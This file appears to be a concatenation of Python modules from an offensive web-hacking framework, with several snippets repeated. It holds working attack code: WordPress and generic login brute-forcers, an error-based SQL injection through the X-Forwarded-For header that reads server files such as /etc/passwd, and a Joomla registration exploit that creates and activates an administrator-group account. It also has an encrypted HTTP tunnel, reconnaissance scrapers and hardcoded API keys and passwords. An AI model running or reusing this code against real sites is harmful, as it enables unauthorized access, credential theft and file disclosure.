def run(self, frmwk, args): module_name = 'attack/web_bruter' frmwk.print_status('Init paprams!') victim = HTTP(self.options['URL'], timeout = self.advanced_options['TIMEOUT']) victim.storecookie = True checktype = 'successstr' tokenstr = 'no-unread-messages' param = 'log=__USER__&pwd=__PASS__&wp-submit=Log+In&redirect_to='+quote_plus(self.options['URL'])+'&testcookie=1' frmwk.print_status('Start bruteforcer!') bruter = frmwk.modules[module_name] bruter.options.addString('URL', 'Link login', default = self.options['URL']) bruter.options.addString('USERNAME', 'Account login', default = self.options['USERNAME']) bruter.options.addString('PASSWORD', 'Password login', default = self.options['PASSWORD']) bruter.options.addString('DATA', 'Date with POST method', default = param) bruter.options.addString('CHECKTYPE', 'Type of checker success login', default = checktype) bruter.options.addString('TOKEN', 'Error string', default = tokenstr) bruter.options.addInteger('THREADS', 'Date with POST method', default = self.options['THREADS']) bruter.options.addPath('USERLIST', 'passwords to test', default = self.options['USERLIST']) bruter.options.addPath('PASSLIST', 'usernames to test', default = self.options['PASSLIST']) bruter.options.addBoolean('VERBOSE', 'Verbose', default = self.options['VERBOSE']) bruter.advanced_options.addString('COOKIE', 'Cookie', default = victim.headers['Cookie'] if victim.headers['Cookie'] else None) bruter.advanced_options.addInteger('DELAY', 'Delay time', default = self.advanced_options['DELAY']) bruter.advanced_options.addInteger('TIMEOUT', 'Time out request', default = self.advanced_options['TIMEOUT']) bruter.advanced_options.addBoolean('STOP', 'Stop scanning', default = True) bruter.run(frmwk, None) frmwk.reload_module(module_name)
def Whoiswebhosting(self, searcher): req = HTTP(searcher['URL']) urls = [] data = req.Request(searcher['URL'] % (self.ip, 1)) last = search( r'\?pi=([0-9]+)\&ob=SLD\&oo=DESC">\ \;\ \;Last\ \;>\>\;<\/a>', data) url = findall( r'<td><a href="http:\/\/whois\.webhosting\.info\/.*?\.">(.*?)\.<\/a><\/td>', data) urls += url if last: page = last.group(1) for i in range(2, int(page)): data = req.Request(searcher['URL'] % (self.ip, i)) if search( 'The security key helps us prevent automated searches', data): break url = findall( r'<td><a href="http:\/\/whois\.webhosting\.info\/.*?\.">(.*?)\.<\/a><\/td>', data) urls += url self.frmwk.print_status( self.fmt_string.format(searcher['SITE'], urls.__len__())) self.domains += urls else: self.frmwk.print_status( self.fmt_string.format(searcher['SITE'], urls.__len__())) self.domains += urls
def run(self, frmwk, args): module_name = 'attack/web_bruter' frmwk.print_status('Init paprams!') victim = HTTP(self.options['URL'], timeout=self.advanced_options['TIMEOUT']) victim.storecookie = True checktype = 'successstr' tokenstr = 'no-unread-messages' param = 'log=__USER__&pwd=__PASS__&wp-submit=Log+In&redirect_to=' + quote_plus( self.options['URL']) + '&testcookie=1' frmwk.print_status('Start bruteforcer!') bruter = frmwk.modules[module_name] bruter.options.addString('URL', 'Link login', default=self.options['URL']) bruter.options.addString('USERNAME', 'Account login', default=self.options['USERNAME']) bruter.options.addString('PASSWORD', 'Password login', default=self.options['PASSWORD']) bruter.options.addString('DATA', 'Date with POST method', default=param) bruter.options.addString('CHECKTYPE', 'Type of checker success login', default=checktype) bruter.options.addString('TOKEN', 'Error string', default=tokenstr) bruter.options.addInteger('THREADS', 'Date with POST method', default=self.options['THREADS']) bruter.options.addPath('USERLIST', 'passwords to test', default=self.options['USERLIST']) bruter.options.addPath('PASSLIST', 'usernames to test', default=self.options['PASSLIST']) bruter.options.addBoolean('VERBOSE', 'Verbose', default=self.options['VERBOSE']) bruter.advanced_options.addString('COOKIE', 'Cookie', default=victim.headers['Cookie'] if victim.headers['Cookie'] else None) bruter.advanced_options.addInteger( 'DELAY', 'Delay time', default=self.advanced_options['DELAY']) bruter.advanced_options.addInteger( 'TIMEOUT', 'Time out request', default=self.advanced_options['TIMEOUT']) bruter.advanced_options.addBoolean('STOP', 'Stop scanning', default=True) bruter.run(frmwk, None) frmwk.reload_module(module_name)
def __init__(self, host, keyworld, limit, delay): super().__init__() self.keyworld = quote_plus(keyworld) self.limit = limit self.delay = delay self.request = HTTP(host, CONFIG.TIME_OUT, user_agents_type='bot') self.count = 0 self.info = [] self.step = 10
def eWhois(self, searcher): params = urlencode({'_method':'POST','data[User][email]':'*****@*****.**','data[User][password]':'RitX:::R1tX','data[User][remember_me]':'0'}) req = HTTP("http://www.ewhois.com/") req.storecookie = True req.rand_useragent = False data = req.Request('http://www.ewhois.com/login/', 'POST', params) data = req.Request("http://www.ewhois.com/export/ip-address/%s/" % self.ip) urls = findall(r'"(.*?)","","","[UA\-[0-9]+\-[0-9]+|]",""',data) self.frmwk.print_status(self.fmt_string.format(searcher['SITE'],urls.__len__())) self.domains += urls
def BingApi(self, searcher): KEY = "49EB4B94127F7C7836C96DEB3F2CD8A6D12BDB71" req = HTTP(searcher['URL']) data = req.Request(searcher['URL'] % (KEY, self.ip, 0)) total = search('<web:Total>([0-9]+)<\/web:Total>', data).group(1) page = int(int(total) / 50 + 1) for i in range(1, page): data += req.Request(searcher['URL'] % (KEY, self.ip, i)) result = findall(r'<web:Url>(.+?)<\/web:Url>', data) urls = [] for url in result: urls.append(url.split('/', 3)[2]) self.frmwk.print_status( self.fmt_string.format(searcher['SITE'], urls.__len__())) self.domains += urls
class Module(Templates): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.version = 1 self.author = [ 'Kid' ] self.description = 'Get Basic Meter Information By Reading Tables' self.detailed_description = 'This module retreives some basic meter information and displays it in a human-readable way.' self.options.addString('FILE', 'domain/ip', default = '/etc/passwd') def run(self, frmwk, args): url = 'http://www.google.com/' self.victim = HTTP(url) len = 1 # join = '' while True: header = {'x-forwarded-for': "1' order by (SELECT 1 from (select count(*),concat(floor(rand(0)*2),(substring((select(LOAD_FILE('%s'))),%s,62)))a from information_schema.tables group by a)b);-- -'" % (self.options['FILE'], len)} data = self.victim.Request(url, 'POST', "uname=administrator&upass=12345612345&Submit=+++Login+++",header = header) # print(data) res = search("Duplicate entry '.(.*?)' for key ", data, DOTALL) if res: # join += res.group(1) stdout.write(res.group(1)) stdout.flush() else: break len += 62 # print('--------------data---------- : \n' + join)
def Filter(domain, infos, type): subs = [] emails = [] checked = [] req = HTTP('https://docs.google.com/') ci = 0 il = len(infos) for i in infos: ci += 1 pc = int(ci * 100 / il) print_process(pc) if i in checked: continue i['data'] = unquote(i['data']) d = domain_filter(domain, unquote(i['url'])) d += domain_filter(domain, i['data']) e = email_filter(domain, i['data']) d = sorted(list(set(realdomain(d)))) e = sorted(list(set(realemail(e)))) if len(d) >= type or len(e) >= type: try: data = getLink(req, i['url']) d += domain_filter(domain, data) e += email_filter(domain, data) except Exception as ex: pass sleep(2) subs += sorted(list(set(realdomain(d)))) emails += sorted(list(set(realemail(e)))) checked.append(i) print_line('') return (subs, emails)
def reverseip(self, searcher): try: if 'SP' not in searcher: req = HTTP(searcher['URL']) if 'DATA' in searcher: data = req.Request(searcher['URL'], 'POST', searcher['DATA'] % self.ip) else: data = req.Request(searcher['URL'] % self.ip) urls = findall(searcher['REGEX'], data) self.frmwk.print_status( self.fmt_string.format(searcher['SITE'], urls.__len__())) self.domains += urls else: searcher['SP'](searcher) except Exception as e: pass
def run(self, frmwk, args): url = 'http://www.google.com/' self.victim = HTTP(url) len = 1 # join = '' while True: header = {'x-forwarded-for': "1' order by (SELECT 1 from (select count(*),concat(floor(rand(0)*2),(substring((select(LOAD_FILE('%s'))),%s,62)))a from information_schema.tables group by a)b);-- -'" % (self.options['FILE'], len)} data = self.victim.Request(url, 'POST', "uname=administrator&upass=12345612345&Submit=+++Login+++",header = header) # print(data) res = search("Duplicate entry '.(.*?)' for key ", data, DOTALL) if res: # join += res.group(1) stdout.write(res.group(1)) stdout.flush() else: break len += 62 # print('--------------data---------- : \n' + join)
def run(self, frmwk, args): self.frmwk = frmwk self.victim = HTTP(self.options['URL'], timeout=self.advanced_options['TIMEOUT']) self.victim.storecookie = True self.verbose = self.options['VERBOSE'] self.userlist = [] self.passlist = [] self.success = [] self.victim.headers.update({'Cookie': self.advanced_options['COOKIE']} if self.advanced_options['COOKIE'] else {}) ####################################### if self.options['USERNAME']: self.userlist = self.options['USERNAME'].split(',') else: self.userlist = ReadFromFile(FullPath(self.options['USERLIST'])) if self.options['PASSWORD']: self.passlist = self.options['PASSWORD'].split(',') else: for a in ReadFromFile(FullPath(self.options['PASSLIST'])): self.passlist.append(a) self.lenuser = len(self.userlist) self.lenpass = len(self.passlist) ############################################### listthread = [] if len(self.userlist) > 0: self.temppass = [] for i in range(self.options['THREADS']): t = Thread(target=self.worker) listthread.append(t) t.start() try: for t in listthread: t.join() except KeyboardInterrupt: for t in listthread: if t.isAlive(): t.terminate() pass ############################################## self.success = sorted(self.success) self.frmwk.print_line() self.frmwk.print_status("List login:\n-----------") if len(self.success) > 0: for u, p in self.success: self.frmwk.print_success( 'SUCCESS: username: {0:<20} password: {1}'.format( u, p)) self.frmwk.print_status("-----------") else: self.frmwk.print_status('Nothing to do!')
def run(self, frmwk, args): self.frmwk = frmwk self.module_name = 'attack/web_bruter' checktype = 'successstr' tokenstr = 'no-unread-messages' self.frmwk.print_status('Init paprams!') self.victim = HTTP(self.options['URL'], timeout=self.advanced_options['TIMEOUT']) self.victim.storecookie = True self.frmwk.print_status('Start bruteforcer!') brute = self.frmwk.modules[self.module_name] brute.options.addString('URL', 'Link login', default=self.options['URL']) brute.options.addString('USERNAME', 'Account login', default=self.options['USERNAME']) brute.options.addString('PASSWORD', 'Password login', default=self.options['PASSWORD']) brute.options.addString('DATA', 'Date with POST method', default='') brute.options.addString('CHECKTYPE', 'Type of checker success login', default=checktype) brute.options.addString('TOKEN', 'Error string', default=tokenstr) brute.options.addInteger('THREADS', 'Date with POST method', default=self.options['THREADS']) brute.options.addPath('USERLIST', 'passwords to test', default=self.options['USERLIST']) brute.options.addPath('PASSLIST', 'usernames to test', default=self.options['PASSLIST']) brute.options.addBoolean('VERBOSE', 'Verbose', default=self.options['VERBOSE']) brute.advanced_options.addString('COOKIE', 'Cookie', default=None) brute.advanced_options.addInteger( 'DELAY', 'Delay time', default=self.advanced_options['DELAY']) brute.advanced_options.addInteger( 'TIMEOUT', 'Time out request', default=self.advanced_options['TIMEOUT']) brute.advanced_options.addBoolean('STOP', 'Stop scanning', default=True) brute.initcallbacker = self.initer brute.run(self.frmwk, None) self.login = brute.success self.frmwk.reload_module(self.module_name)
class Searcher(Thread): """docstring for Searcher""" def __init__(self, host, keyworld, limit, delay): super().__init__() self.keyworld = quote_plus(keyworld) self.limit = limit self.delay = delay self.request = HTTP(host, CONFIG.TIME_OUT, user_agents_type='bot') self.count = 0 self.info = [] self.step = 10 def run(self): while True: printer.print_line('\t{0:<25} {1:d}'.format(self.name, self.count)) uri = self.uriCreater() if not self.Has_Next(self.do_search(uri)): break if self.count <= 1: break self.count += self.step if self.count >= self.limit: break sleep(self.delay) def do_search(self, uri): data = self.request.Request(uri) #print("-----------data : %s" % data) if data != '': try: info = self.Getdata(data) except Exception as e: printer.print_error('%s : Nothing to do !' % self.name) pass return '' self.do_split(info) return data def do_split(self, info): ifl = [] for i in info: try: ifl.append(self.Spliter(i.strip())) except Exception as e: printer.print_error('%s Error : %s\ncontent: %s' % (self.name, e, i)) pass self.info += ifl self.step = len(ifl)
def run(self, frmwk, args): url = self.options['URL'] email = CONFIG.GMAIL_ACCOUNT[0] self.username = '******' + str(randint(1000,100000)) self.password = '******' victim = HTTP(url) victim.storecookie = True exploit = 'jform%5Bname%5D=exploit&jform%5Busername%5D=exploit&jform%5Bpassword1%5D=123123&jform%5Bpassword2%5D=1231233&jform%5Bemail1%5D=pentest%40yahoo.com&jform%5Bemail2%5D=pentest%40yahoo.com&option=com_users&task=registration.register&jform%5Bgroups%5D%5B%5D=7&' registry = 'jform%5Bname%5D={0}&jform%5Busername%5D={0}&jform%5Bpassword1%5D={1}&jform%5Bpassword2%5D={1}&jform%5Bemail1%5D={2}&jform%5Bemail2%5D={2}&option=com_users&task=registration.register&jform%5Bgroups%5D%5B%5D=7&'.format(self.username, self.password, email) frmwk.print_status('Init token') data = victim.Request(url) token = search('name="([a-zA-Z0-9]{32})"\svalue="1"', data) if token: token = token.group(1) else: token = '' frmwk.print_status('Send false request') url = url + '?task=registration.register' victim.Request(url, 'POST', exploit + token + '=1') frmwk.print_status('Send exploit request') data = victim.Request(url, 'POST', registry + token + '=1') warning = search('class="warning\smessage">(.*?)</dd>', data, DOTALL) message = search('class="message\smessage">(.*?)</dd>', data, DOTALL) if warning: frmwk.print_error('Error during exploit : ' + warning.group(1)) return elif message: frmwk.print_success('Successful : ' + message.group(1).strip()) frmwk.print_success('Account login: %s | %s' % (self.username, self.password)) else: frmwk.print_status('Hên xui !') frmwk.print_status('Sleep 30s for mail receiver !') sleep(30) for email in self.getMail(): active = search('(http(.*?)activate&token=(.*?))\s', email['body'], DOTALL) if active: active_link = active.group(1) frmwk.print_status('Active link: ' + active_link) break if active_link: data = victim.Request(active_link) message = search('class="message\smessage">(.*?)</dd>', data, DOTALL) if message: frmwk.print_success('Actived Account: %s | %s' % (self.username, self.password))
def eWhois(self, searcher): params = urlencode({ '_method': 'POST', 'data[User][email]': '*****@*****.**', 'data[User][password]': 'RitX:::R1tX', 'data[User][remember_me]': '0' }) req = HTTP("http://www.ewhois.com/") req.storecookie = True req.rand_useragent = False data = req.Request('http://www.ewhois.com/login/', 'POST', params) data = req.Request("http://www.ewhois.com/export/ip-address/%s/" % self.ip) urls = findall(r'"(.*?)","","","[UA\-[0-9]+\-[0-9]+|]",""', data) self.frmwk.print_status( self.fmt_string.format(searcher['SITE'], urls.__len__())) self.domains += urls
def worker(self, c_conn, c_addr): self.frmwk.print_status("Accept new connect from " + str(c_addr)) ################### CONNET TUNNEL ##################### ### choin and connect to tunnel c_tunnel = self.choin_tunnel() # chon 1 tunnel t_conn = HTTP(c_tunnel[0], timeout=self.connect_timout) ### check tunnel is open if not t_conn: self.frmwk.print_error("Can't connect to tunnel") return None ### encrypt/decrypt init # tunnel_ks = self.vc_generatekeyhash(c_tunnel[2]) # tunnel_pe = self.vc_init(c_tunnel[2],tunnel_ks) # tunnel_pd = dict((tunnel_pe[i],i) for i in range(0,len(tunnel_pe))) if self.encrypt: crypt = crypton(c_tunnel[2]) else: crypt = None ################### START READ DATA CLIENT ##################### ### get status and header from sockert c_status, c_headers, c_content_len = self.socket_receiver(c_conn) ### set url, host, port, method s_https = 0 host = c_status[1] if host.startswith(b"http"): parser = parse.urlparse(host) s_host = parser.hostname s_port = parser.port s_path = b"/" + host.split(b"/", 3)[3] if not s_port: if parser.scheme == "https": s_port = 443 else: s_port = 80 if parser.scheme == "https": s_https = 1 else: self.frmwk.print_error("Unknown client request connect !") return None ### set status c_send_header = [b" ".join([c_status[0], s_path, c_status[2]])] ### set header for send c_headers.update({b"Connection": b"close"}) # fix host delay for k, v in c_headers.items(): if k.startswith(b"Proxy"): continue c_send_header.append(k + b": " + v) ## add headers to send all data c_send_header = b"\r\n".join(c_send_header) + b"\r\n\r\n" ### set init param of tunnel c_send_init = self.send_init(s_host, s_port, self.r_buffer, self.s_buffer, s_https, c_tunnel, crypt) ### init and send tunnel parameter t_conn.init(c_tunnel[0], "POST", {"Content-Length": len(c_send_init) + len(c_send_header) + c_content_len}) t_conn.send(c_send_init) del c_send_init # clear memory ### get content from client and send to server with r_buffer if c_content_len > 0: c_sent = 0 ####### send header with content for full r_buffer encrypt if self.encrypt: mod_len = len(c_send_header) % len(c_tunnel[2]) data = c_conn.recv(mod_len) data = c_send_header + data data_len = len(data) for i in range(0, data_len, self.r_buffer): t_conn.send(crypt.vc_encrypt(data[i : min(i + self.r_buffer, data_len - i)])) c_sent = mod_len else: t_conn.send(c_send_header) ###### send content if c_sent < c_content_len: while True: data = c_conn.recv(min(self.r_buffer, c_content_len - c_sent)) if self.encrypt: t_conn.send(crypt.vc_encrypt(data)) else: t_conn.send(data) c_sent += len(data) if not data or c_sent == content_lent: break else: if self.encrypt: t_conn.send(crypt.vc_encrypt(c_send_header)) else: t_conn.send(c_send_header) del c_send_header # clear memory ############## END SEND ################ ############# START RECV ############### try: for res_chunk in t_conn.recv(self.s_buffer): if self.encrypt: c_conn.send(crypt.vc_decrypt(res_chunk)) else: c_conn.send(res_chunk) except Exception as e: self.frmwk.print_error(str(e)) finally: t_conn.request.close() c_conn.close() self.frmwk.print_status("Closed connect from " + str(c_addr))
def run(self, frmwk, args): self.version = None url = self.options['URL'] if not url.endswith('/'): url += '/' ###### dict from http://www.pepelux.org/programs/joomlascan/ ####### storeversion = [ [ 'language/en-GB/en-GB.ini', [[ 'version 1.5.x 2005-10-30 14:10:00', '1.5.0.Beta-1.5.0.Beta' ], ['9913 2008-01-09 21:28:35Z', '1.5.0.Stable-1.5.0.Stable'], ['9990 2008-02-05 21:54:06Z', '1.5.1.Stable-1.5.1.Stable'], ['10053 2008-02-21 18:57:54Z', '1.5.2.Stable-1.5.2.Stable'], ['10208 2008-04-17 16:43:15Z', '1.5.3.Stable'], ['10498 2008-07-04 00:05:36Z', '1.5.4.Stable-1.5.7.Stable'], ['11214 2008-10-26 01:29:04Z', '1.5.8.Stable-1.5.8.Stable'], ['11391 2009-01-04 13:35:50Z', '1.5.9.Stable-1.5.11.Stable'], [ 'Copyright (C) 2005 - 2010 Open Source Matters', '1.5.16.Stable-1.5.20.Stable' ], ['Problem with Joomla site', '1.5.17.Stable-1.5.17.Stable'], ['17165 2010-05-17 15:59:19Z', '1.6.0.Beta1-1.6.0.Beta1'], ['17420 2010-05-31 11:14:10Z', '1.6.0.Beta2-1.6.0.Beta2'], ['17675 2010-06-14 10:20:52Z', '1.6.0.Beta3-1.6.0.Beta3'], ['17903 2010-06-28 01:52:11Z', '1.6.0.Beta4-1.6.0.Beta4'], ['18082 2010-07-12 01:02:52Z', '1.6.0.Beta5-1.6.0.Beta5'], ['18198 2010-07-21 00:58:13Z', '1.6.0.Beta6-1.6.0.Beta8'], ['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.1.Stable'], ['20990 2011-03-18 16:42:30Z', '1.6.2.Stable-1.7.5.Stable']] ], [ 'components/com_contact/metadata.xml', [['8178 2007-07-23 05:39:47Z', '1.5.0.RC2-1.5.18.Stable'], ['17437 2010-06-01 14:35:04Z', '1.5.19.Stable-1.5.20.Stable'], ['16235 2010-04-20 04:13:25Z', '1.6.0.Stable-1.7.5.Stable']] ], [ 'htaccess.txt', [['47 2005-09-15 02:55:27Z', '1.0.0-1.0.2'], ['423 2005-10-09 18:23:50Z', '1.0.3-1.0.3'], ['1005 2005-11-13 17:33:59Z', '1.0.4-1.0.5'], ['1570 2005-12-29 05:53:33Z', '1.0.6-1.0.7'], ['2368 2006-02-14 17:40:02Z', '1.0.8-1.0.9'], ['4085 2006-06-21 16:03:54Z', '1.0.10-1.0.10'], ['4756 2006-08-25 16:07:11Z', '1.0.11-1.0.11'], ['5973 2006-12-11 01:26:33Z', '1.0.12-1.0.12'], ['5975 2006-12-11 01:26:33Z', '1.0.13-1.0.14.RC1'], ['9317 2007-11-07 03:02:08Z', '1.5.0.RC4-1.5.0.Stable'], ['10492 2008-07-02 06:38:28Z', '1.5.0.Beta-1.5.14.Stable'], ['13415 2009-11-03 15:53:25Z', '1.5.15.Stable-1.5.15.Stable'], ['14401 2010-01-26 14:10:00Z', '1.5.16.Stable-1.5.20.Stable'], ['14276 2010-01-18 14:20:28Z', '1.6.0.Beta1-1.6.0.Beta8'], ['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.1.Stable'], ['21101 2011-04-07 15:47:33Z', '1.6.2.Stable-1.7.5.Stable']] ], [ 'administrator/language/en-GB/en-GB.ini', [[ 'version 1.5.x 2005-10-30 14:10:00', '1.5.0.Beta-1.5.0.Beta' ], ['9869 2008-01-05 04:00:13Z', '1.5.0.Stable-1.5.0.Stable'], ['9990 2008-02-05 21:54:06Z', '1.5.1.Stable-1.5.1.Stable'], ['10122 2008-03-10 11:58:27Z', '1.5.2.Stable-1.5.2.Stable'], ['10186 2008-04-02 13:10:12Z', '1.5.3.Stable-1.5.3.Stable'], ['10500 2008-07-04 06:57:07Z', '1.5.4.Stable-1.5.4.Stable'], ['10571 2008-07-21 01:27:35Z', '1.5.5.Stable-1.5.7.Stable'], ['11213 2008-10-25 12:43:11Z', '1.5.8.Stable-1.5.8.Stable'], ['11391 2009-01-04 13:35:50Z', '1.5.9.Stable-1.5.9.Stable'], ['11667 2009-03-08 20:32:38Z', '1.5.10.Stable-1.5.10.Stable'], ['11799 2009-05-06 02:15:50Z', '1.5.11.Stable-1.5.11.Stable'], ['12308 2009-06-23 04:05:28Z', '1.5.12.Stable-1.5.14.Stable'], ['13243 2009-10-20 04:01:04Z', '1.5.15.Stable-1.5.15.Stable'], ['16380 2010-04-23 09:19:48Z', '1.5.16.Stable-1.5.20.Stable'], ['17165 2010-05-17 15:59:19Z', '1.6.0.Beta1-1.6.0.Beta1'], ['17387 2010-05-30 16:28:20Z', '1.6.0.Beta2-1.6.0.Beta2'], ['17675 2010-06-14 10:20:52Z', '1.6.0.Beta3-1.6.0.Beta3'], ['17898 2010-06-27 13:03:01Z', '1.6.0.Beta4-1.6.0.Beta4'], ['18090 2010-07-12 10:49:58Z', '1.6.0.Beta5-1.6.0.Beta5'], ['18198 2010-07-21 00:58:13Z', '1.6.0.Beta6-1.6.0.Beta6'], ['18378 2010-08-09 17:29:44Z', '1.6.0.Beta7-1.6.0.Beta7'], ['18572 2010-08-22 09:57:58Z', '1.6.0.Beta8-1.6.0.Beta8'], ['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.0.Stable'], ['20899 2011-03-07 20:56:09Z', '1.6.1.Stable-1.6.1.Stable'], ['20990 2011-03-18 16:42:30Z', '1.6.2.Stable-1.6.6.Stable'], ['21721 2011-07-01 08:48:47Z', '1.7.0.Stable-1.7.2.Stable'], ['22370 2011-11-09 16:18:06Z', '1.7.3.Stable-1.7.5.Stable']] ], [ 'language/en-GB/en-GB.com_media.ini', [['10496 2008-07-03 07:08:39Z', '1.5.0.Beta-1.5.12.Stable'], ['12540 2009-07-22 17:34:44Z', '1.5.13.Stable-1.5.14.Stable'], ['13311 2009-10-24 04:13:49Z', '1.5.15.Stable-1.5.15.Stable'], ['14401 2010-01-26 14:10:00Z', '1.5.16.Stable-1.5.20.Stable'], ['17044 2010-05-14 09:52:50Z', '1.6.0.Beta1-1.6.0.Beta3'], ['17769 2010-06-20 01:50:48Z', '1.6.0.Beta4-1.6.0.Beta8'], ['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.6.Stable'], ['21660 2011-06-23 13:25:32Z', '1.7.0.Stable-1.7.0.Stable'], ['21948 2011-08-08 16:02:50Z', '1.7.1.Stable-1.7.5.Stable']] ], [ 'configuration.php-dist', [['47 2005-09-15 02:55:27Z', '1.0.0-1.0.0'], ['217 2005-09-21 15:15:58Z', '1.0.1-1.0.2'], ['506 2005-10-13 05:49:24Z', '1.0.3-1.0.7'], ['2622 2006-02-26 04:16:09Z', '1.0.8-1.0.8'], ['3754 2006-05-31 12:08:37Z', '1.0.9-1.0.10'], ['4802 2006-08-28 16:18:33Z', '1.0.11-1.0.12'], ['7424 2007-05-17 15:56:10Z', '1.0.13-1.0.15'], ['9991 2008-02-05 22:13:22Z', '1.5.0.Stable-1.5.8.Stable'], ['11409 2009-01-10 02:27:08Z', '1.5.9.Stable-1.5.9.Stable'], ['11687 2009-03-11 17:49:23Z', '1.5.10.Stable-1.5.15.Stable'], ['14401 2010-01-26 14:10:00Z', '1.5.16.Stable-1.5.20.Stable']] ] ] requester = HTTP(url) for link in storeversion: frmwk.print_status('Checking: ' + url + link[0]) data = requester.Request(url + link[0]) if requester.response.status == 200: for vstr in link[1]: if data.find(vstr[0]) != -1: self.version = vstr[1] break if self.version: break if not self.version: frmwk.print_status('Checking: ' + url + 'language/en-GB/en-GB.xml') data = requester.Request(url + 'language/en-GB/en-GB.xml') if requester.response.status == 200: version = search('<version>(.*?)</version>', data) if version: self.version = version.group(1) if not self.version: frmwk.print_status('Checking: ' + url + 'components/com_mailto/mailto.xml') data = requester.Request(url + 'components/com_mailto/mailto.xml') if requester.response.status == 200: version = search('<version>(.*?)</version>', data) if version: self.version = version.group(1) if self.version: frmwk.print_success('Fount version: ' + self.version) else: frmwk.print_error('Unknown version !')
def worker(self, c_conn, c_addr): self.frmwk.print_status("Accept new connect from " + str(c_addr)) ################### CONNET TUNNEL ##################### ### choin and connect to tunnel c_tunnel = self.choin_tunnel() # chon 1 tunnel t_conn = HTTP(c_tunnel[0], timeout=self.connect_timout) ### check tunnel is open if not t_conn: self.frmwk.print_error('Can\'t connect to tunnel') return None ### encrypt/decrypt init # tunnel_ks = self.vc_generatekeyhash(c_tunnel[2]) # tunnel_pe = self.vc_init(c_tunnel[2],tunnel_ks) # tunnel_pd = dict((tunnel_pe[i],i) for i in range(0,len(tunnel_pe))) if self.encrypt: crypt = crypton(c_tunnel[2]) else: crypt = None ################### START READ DATA CLIENT ##################### ### get status and header from sockert c_status, c_headers, c_content_len = self.socket_receiver(c_conn) ### set url, host, port, method s_https = 0 host = c_status[1] if host.startswith(b'http'): parser = parse.urlparse(host) s_host = parser.hostname s_port = parser.port s_path = b'/' + host.split(b'/', 3)[3] if not s_port: if parser.scheme == 'https': s_port = 443 else: s_port = 80 if parser.scheme == 'https': s_https = 1 else: self.frmwk.print_error("Unknown client request connect !") return None ### set status c_send_header = [b' '.join([c_status[0], s_path, c_status[2]])] ### set header for send c_headers.update({b'Connection': b'close'}) # fix host delay for k, v in c_headers.items(): if k.startswith(b'Proxy'): continue c_send_header.append(k + b': ' + v) ## add headers to send all data c_send_header = b"\r\n".join(c_send_header) + b"\r\n\r\n" ### set init param of tunnel c_send_init = self.send_init(s_host, s_port, self.r_buffer, self.s_buffer, s_https, c_tunnel, crypt) ### init and send tunnel parameter t_conn.init( c_tunnel[0], 'POST', { 'Content-Length': len(c_send_init) + len(c_send_header) + c_content_len }) t_conn.send(c_send_init) del c_send_init # clear memory ### get content from client and send to server with r_buffer if c_content_len > 0: c_sent = 0 ####### send header with content for full r_buffer encrypt if self.encrypt: mod_len = len(c_send_header) % len(c_tunnel[2]) data = c_conn.recv(mod_len) data = c_send_header + data data_len = len(data) for i in range(0, data_len, self.r_buffer): t_conn.send( crypt.vc_encrypt( data[i:min(i + self.r_buffer, data_len - i)])) c_sent = mod_len else: t_conn.send(c_send_header) ###### send content if c_sent < c_content_len: while True: data = c_conn.recv( min(self.r_buffer, c_content_len - c_sent)) if self.encrypt: t_conn.send(crypt.vc_encrypt(data)) else: t_conn.send(data) c_sent += len(data) if not data or c_sent == content_lent: break else: if self.encrypt: t_conn.send(crypt.vc_encrypt(c_send_header)) else: t_conn.send(c_send_header) del c_send_header # clear memory ############## END SEND ################ ############# START RECV ############### try: for res_chunk in t_conn.recv(self.s_buffer): if self.encrypt: c_conn.send(crypt.vc_decrypt(res_chunk)) else: c_conn.send(res_chunk) except Exception as e: self.frmwk.print_error(str(e)) finally: t_conn.request.close() c_conn.close() self.frmwk.print_status("Closed connect from " + str(c_addr))
def run(self, frmwk, args): self.frmwk = frmwk self.dirs = ReadFromFile(FullPath( self.options['DIRLIST'])) if self.options['DIRLIST'] else [] self.files = ReadFromFile(FullPath( self.options['FILELIST'])) if self.options['FILELIST'] else [] self.url = self.options['URL'] if self.options['URL'].endswith( '/') else self.options['URL'] + '/' self.type = self.options['TYPE'] self.thread = self.options['THREADS'] self.stop = self.options['STOP'] self.extension = self.options['EXTENSION'].split(',') self.timeout = self.advanced_options['TIMEOUT'] self.into = self.advanced_options['INTO'] self.victim = HTTP(self.url, timeout=self.timeout) self.victim.headers.update({'Cookie': self.advanced_options['COOKIE']} if self.advanced_options['COOKIE'] else {}) self.success = [] self.tmp_dirs = self.dirs + [] self.current_dir = '' self.locker = Lock() if self.type in ['lenght', 'auto']: victim = deepcopy(self.victim) victim.redirect = False self.frmwk.print_status('Init not found infomation') victim.Request(self.url + 'ASDASdadhkjlhjfasdfawefa/', 'GET') if self.type == 'auto': # if victim.response.status == 404: # self.type = 'status' # self.frmwk.print_success('auto get type: error') # el if victim.response.status == 200: self.type = 'lenght' self.frmwk.print_success('auto get type: lenght') else: self.type = 'location' self.frmwk.print_success('auto get type: location') if self.type == 'lenght': self.notfounddir = len(victim.result) if self.type in ['lenght', 'location']: self.notfoundfile = len( victim.Request( self.url + 'adfasdaszxcvzdczxfasASasda.' + self.extension[0], 'GET')) self.offset = self.advanced_options['OFFSET'] del victim if self.type == 'location': self.victim.redirect = False self.frmwk.print_status('Starting scanner') ########check file in current path###### try: if self.url.endswith('/'): self.url = self.url[:-1] self.filechecker(self.url) if not self.url.endswith('/'): self.url = self.url + '/' ######################################## threads = [] for i in range(self.thread): t = Thread(target=self.worker) threads.append(t) t.start() for t in threads: t.join() except KeyboardInterrupt: for t in threads: if t.isAlive(): t.terminate() pass if len(self.success) > 0: self.frmwk.print_success('Found list:\n-----------') for link in self.success: self.frmwk.print_success(link) else: self.frmwk.print_error('---------\nNot Found!\n---------')